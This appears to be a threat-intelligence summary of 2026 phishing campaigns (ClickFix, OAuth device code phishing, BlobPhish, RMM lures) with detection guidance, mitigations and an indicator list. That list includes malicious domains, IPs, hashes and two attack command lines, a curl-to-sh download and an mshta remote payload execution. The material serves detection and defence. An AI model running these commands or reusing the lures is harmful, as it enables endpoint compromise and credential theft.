Skip to content
.ca
sign in
7 minhigh

Top 5 Phishing-Driven Social Engineering Attacks on Companies in 2026

Modern social engineering attacks have evolved to closely mimic legitimate business workflows, utilizing techniques like ClickFix, OAuth device code abuse, and in-browser blob phishing. These tactics bypass traditional security controls and create "gray-zone" alerts that require deep behavioral analysis to determine the true scope of compromise, such as credential theft, token abuse, or RMM deployment.

Conf:highAnalyzed:2026-05-24Google
ActorsBlobPhishClickFixEvilTokensAMOS
PhishingSocial EngineeringOAuth AbuseBlobPhishClickFix

Source:ANY.RUN

IOCs · 25

Detection / HunterGoogle

What Happened

Cybercriminals are using highly convincing fake login pages, AI tool instructions, and event invitations to trick employees into giving up access to company systems. These attacks affect anyone using standard business tools like Microsoft 365, banking portals, or AI assistants. This matters because these modern phishing techniques often bypass standard security filters and can lead to stolen passwords, financial fraud, or remote control of company computers. Organizations should ensure their security teams have the tools to quickly analyze suspicious links and behaviors before a minor click turns into a major breach.

Key Takeaways

  • Modern social engineering closely mimics legitimate workflows, such as Microsoft logins, AI tool documentation, and event invitations, making detection difficult.
  • ClickFix attacks abuse employee trust in AI tools (like Claude or Grok) to trick users into manually running malicious terminal commands.
  • OAuth device code phishing (EvilTokens) bypasses traditional credential theft by tricking users into authorizing malicious applications directly.
  • Banking phishing campaigns (BlobPhish) utilize in-browser blob objects to evade traditional URL and network detection mechanisms.
  • Fake event invitations are increasingly used as lures to deliver Remote Monitoring and Management (RMM) tools for persistent access.

Affected Systems

  • Windows
  • macOS
  • Microsoft 365
  • Web Browsers

Attack Chain

Attackers utilize highly convincing social engineering lures, such as fake Microsoft logins, AI tool documentation, or event invitations, delivered via email or web redirects. Victims are tricked into interacting with these pages, which may use in-browser blob objects to evade detection or abuse OAuth device code flows to steal access tokens directly. In ClickFix scenarios, users are prompted to manually copy and paste malicious commands into their terminal, leading to the execution of stealers like AMOS on macOS or remote access tools on Windows. The final impact ranges from credential and token theft to full endpoint compromise and lateral movement.

Detection Availability

  • YARA Rules: No
  • Sigma Rules: Yes
  • Snort/Suricata Rules: Yes
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Sigma, Suricata, ANY.RUN

The article and accompanying images indicate that Sigma and Suricata rules are available within the ANY.RUN platform to detect the observed phishing and malware behaviors.

Detection Engineering Assessment

EDR Visibility: High — EDR solutions can easily detect the execution of suspicious commands (like mshta reaching out to external URLs or curl piping to sh) resulting from ClickFix attacks, as well as the deployment of RMM tools. Network Visibility: Medium — While network tools can spot connections to known malicious infrastructure, techniques like BlobPhish (in-browser blobs) and OAuth device code abuse (using legitimate Microsoft endpoints) blend in with normal traffic, reducing network-level detection efficacy. Detection Difficulty: Moderate — The initial lures closely mimic legitimate workflows and abuse trusted services (OAuth, AI tools), making initial detection hard. However, the post-click execution (e.g., terminal commands, RMM installation) provides clear behavioral signals.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • DNS Queries
  • Proxy/Web Gateway Logs
  • Cloud Audit Logs (Azure AD/Entra ID sign-ins)

Hunting Hypotheses

HypothesisTelemetryATT&CK StageFP Risk
Consider hunting for instances of mshta.exe executing with external HTTP/HTTPS URLs in the command line, which may indicate ClickFix or similar payload delivery.Process Creation LogsExecutionLow
Evaluate whether users are executing curl commands that pipe output directly to sh or bash, especially when the command contains base64 encoded strings, as seen in macOS ClickFix attacks.macOS Unified Logs / EDR Process TelemetryExecutionMedium
If you have visibility into cloud identity logs, consider hunting for unusual OAuth device code authentication flows, particularly those originating from unexpected locations or resulting in new application consents.Cloud Identity/Authentication LogsCredential AccessMedium

Control Gaps

  • Traditional URL filtering (bypassed by BlobPhish and abused legitimate services)
  • Standard MFA (bypassed by OAuth device code phishing)

Key Behavioral Indicators

  • Execution of mshta.exe with remote URLs
  • Piping curl output to shell interpreters on macOS
  • Unexpected RMM tool installations (ScreenConnect, ITarian) following web browsing activity

False Positive Assessment

  • Medium. While the specific IOCs are highly malicious, hunting for generic behaviors like OAuth device code flows or RMM tool usage may yield false positives in environments where these are used legitimately.

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider blocking the identified malicious domains and IP addresses at the perimeter.
  • Evaluate whether recent alerts involving mshta.exe or unusual curl commands warrant immediate endpoint isolation.

Infrastructure Hardening

  • If supported by your cloud environment, consider restricting OAuth application consent to approved applications only.
  • Evaluate whether conditional access policies can be tuned to block anomalous OAuth device code flows.

User Protection

  • Consider restricting the execution of mshta.exe and other LOLBins on user endpoints if they are not required for business operations.
  • If applicable, evaluate deploying browser extensions or web filtering that can inspect and block malicious in-browser blob objects.

Security Awareness

  • Consider updating security awareness training to include examples of ClickFix attacks, emphasizing the danger of copying and pasting terminal commands from unverified sources.
  • Evaluate whether employees are trained to recognize OAuth device code prompts and the risks of authorizing unknown applications.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1218.005 - System Binary Proxy Execution: Mshta
  • T1528 - Steal Application Access Token
  • T1555.001 - Credentials from Password Stores: Keychain
  • T1074.001 - Data Staged: Local Data Staging
  • T1071 - Application Layer Protocol

Additional IOCs

  • Ips:
    • 147[.]45[.]179[.]206 - IP address hosting malicious payloads
    • 62[.]133[.]62[.]234 - IP address hosting malicious payloads
  • Domains:
    • loginmicr0sft0nlineeckaf[.]52632651246148569845521065[.]cc - Fake Microsoft login domain
    • segyen[.]xyz - Malicious domain observed in threat intelligence lookup
    • addossernugkrsqjfa[.]seconddomain[.]su - Malicious domain observed in threat intelligence lookup
    • ofdocwwdwewewedsd2i232[.]pagedemo[.]co - Malicious domain observed in threat intelligence lookup
    • download-version[.]1-4-9[.]com - Domain hosting ClickFix Windows payloads
    • mtl-logistics[.]com - Domain hosting BlobPhish lures
    • legendarysinvited[.]de - Domain hosting fake event invitations
  • Urls:
    • hxxps://is[.]gd/4kZgry - Malicious redirect URL used in OAuth phishing
    • hxxps://github[.]com/shaundretta78/f/blob/main/chang - Abused legitimate infrastructure hosting malicious content
  • File Hashes:
    • 90FE524E6E7361F7E8832F8D88AF335BC6B9561AFB86F4FEB59D5DF859F2EB5E (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 315F08A314E299D30BE098D1D42BB11A818AE39963ED0801F3632F41504F45C (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 33AD558D5B96F97496C5CAB18D32EFBF1DDC0927E219DA488E58F7BEBF5744A7 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 83CC2EF6C031FCCC14C8D259C140EF8452359CF6F1667C07177AC1332901D23 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • B3A23896DF77441FBAC8E4F392953D22C0818583BA4DA443C5200863CCB2048C (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 5904778365F988CCF2C5148F42A4D13636C381407239ADC243300E9C879B956 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 05E801351F3E5CE008625356C47C82080A9F64CBC14432C35A361AF44DABAD (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 2FEF7B04A3CC49C4649789669CDC8463AC2E3FA47D9C3988F99369DC26BA6486 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 03644A5B2B94EA498BB45EFABFB6FC3CA7870505742A3BE32FA3E9B768025D32 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • E188E259FD6CC501108F203718852A50EA9F02B7721E56CBE3D0256740A1154F (SHA256) - Malicious file hash observed in threat intelligence lookup
  • Command Lines:
    • Purpose: Download and execute macOS payload via base64 encoded URL in ClickFix attack | Tools: curl, sh | Stage: Execution | curl -sKfSL $(echo '
    • Purpose: Execute remote HTA payload on Windows in ClickFix attack | Tools: mshta | Stage: Execution | mshta https://download-version.1-4-9.com/

Related